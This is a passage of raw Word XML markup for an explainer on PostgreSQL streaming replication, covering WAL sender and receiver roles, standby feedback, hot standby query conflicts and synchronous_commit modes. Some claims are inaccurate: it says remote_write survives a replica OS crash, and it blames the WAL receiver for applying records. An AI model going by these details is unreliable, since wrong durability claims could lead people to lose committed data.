        <w:t xml:space="preserve">  Authentication: separate pg_hba.conf rules for replication connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F5F9B5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    host  replication  replicator  10.0.0.0/8  scram-sha-256</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377968AD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B1791B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  On connection: replica identifies itself with application_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7FECDA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Visible in pg_stat_replication on primary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAE648E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      pid, usename, application_name, client_addr, state, sent_lsn, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19544AB8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      write_lsn, flush_lsn, replay_lsn, write_lag, flush_lag, replay_lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C331FC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The WAL sender / WAL receiver protocol:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="486172C7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7D1B27" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Primary side: WAL sender process (one per replica connection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23877F5C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Reads WAL from:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202DBE3F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    1. WAL buffers (in shared memory — immediate, no disk read)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E837DA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    2. WAL files on disk (if replica is catching up from far behind)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B36C2F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Sends WAL records to replica as fast as network allows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6649ED36" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Tracks replica's confirmed LSN position</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1E1BEA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4721BE0B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Replica side: WAL receiver process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74848442" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Receives WAL records from primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD2D722" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Writes to replica's WAL files (local durability)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2593F045" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Signals startup process that new WAL is available</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37755465" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B336B8D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Startup process (replica):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB1D749" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Reads newly received WAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379D0E45" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Applies each record to replica's data files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F39458F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Updates recovery progress LSN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732E4647" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514B0EFF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Standby process (replica, read-only queries):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478B3A8E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Serves read queries against replica data files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43524555" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Must handle queries that conflict with WAL application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463AAF5C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  (table being vacuumed on primary → WAL record arrives → must wait for</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54664253" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">   conflicting query to finish before applying, or cancel the query)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720B4530" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The feedback mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356A36E1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C813B4" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Replica → Primary: standby status update message (every wal_receiver_status_interval)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04A8C28D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Contains:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593C4CC0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    received_lsn: furthest WAL byte received</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79593E0F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    flushed_lsn:  furthest WAL byte written to disk on replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAEBD42" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    applied_lsn:  furthest WAL byte applied to replica data files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9F77E7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C79431" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Primary uses this to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488CC2EA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  1. Determine replication lag per replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1E5DCD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  2. Advance wal_keep_size boundary (only keep WAL needed by slowest replica)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370176A9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  3. Implement synchronous replication (wait for specific LSN acknowledgment)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E320E88" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  4. Implement replication slots (never advance past a slot's confirmed_flush_lsn)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716448C7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hot standby conflict resolution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F48DE2C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>When a replica serves read queries and simultaneously applies WAL from the primary, conflicts arise:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19801CC5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DC82C9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Conflict scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40925553" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Replica: long-running OLAP query SELECT * FROM orders WHERE...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E0381B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">           This query holds a relation-level AccessShareLock on orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD52D50" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7938372B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Primary: VACUUM on orders table removes old tuples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA9560B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">           WAL record: "deleted tuples [x,y,z] from orders"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0756D3B8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2904E6BA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Replica: WAL receiver tries to apply vacuum record</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C143FD8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">           Requires conflicting lock with query in progress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE205E0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D085C5C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Resolution options (hot_standby_feedback and max_standby_streaming_delay):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CC042C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C8E227" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Option 1 (default): wait max_standby_streaming_delay (default 30s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0298C7AA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    WAL application pauses waiting for conflicting query to finish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3081E6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    If query takes &gt; 30s: cancel the query with error:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F436C9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      "canceling statement due to conflict with recovery"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E6B2E2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Application must handle this error and retry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D69574C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D46FE95" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Option 2 (hot_standby_feedback = on):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A1A3A0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Replica tells primary which transactions are still in use (xmin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0EF096" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Primary defers vacuum (doesn't remove tuples still needed by replica)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B30A4EC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Pros: queries never cancelled by conflicts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1433EA72" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Cons: table bloat on primary (vacuum can't clean up) — can be severe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B5E2DE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">          for long-running replica queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ACD351E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7B8AE7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Option 3: dedicated replica for OLAP, separate from HA standby</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="278C92F1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    OLAP replica: hot_standby_feedback=on (accept bloat risk, no query cancellation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EDE4EA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    HA standby: hot_standby_feedback=off (accept conflict cancellation, minimize bloat)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F73DC24" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Synchronous Replication — The Durability Guarantee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD149F1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>By default, replication is </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>asynchronous</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t> — the primary commits a transaction and returns success to the client without waiting for any replica to acknowledge receiving the WAL. If the primary crashes immediately after committing, the replica may not have received the WAL — the transaction is </w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>lost</w:t>
      </w:r>
      <w:r w:rsidRPr="00A12791">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0E5593" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Synchronous replication modes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F5DCFE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2BC806" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>synchronous_commit parameter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A58085" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="3F404F59" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">off: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2130EBCA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Don't even wait for local WAL flush (async even for crash safety)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD271C8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Highest performance, weakest durability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6063F7D8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Risk: committed transactions lost on primary crash (until next checkpoint)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762812C6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Use: only for non-critical data where performance matters more than durability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A65390D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="184AA322" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>local:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02610920" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Wait for local WAL flush, don't wait for any replica</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA7C5D3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Default PostgreSQL behavior without synchronous_standby_names</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425D0825" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Survives primary crash (WAL is durable locally)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060E51C8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Committed transaction may not exist on replica after primary failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E640D11" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791"/>
    <w:p w14:paraId="0F5633D9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>remote_write:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790FCA3F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Wait for replica to receive and write WAL to OS buffer (not fsync)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCEB87D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Survives primary crash + replica OS crash (but not replica hardware failure)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8878F0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Faster than remote_apply (no fsync wait on replica)</w:t>
      </w:r>
    </w:p>
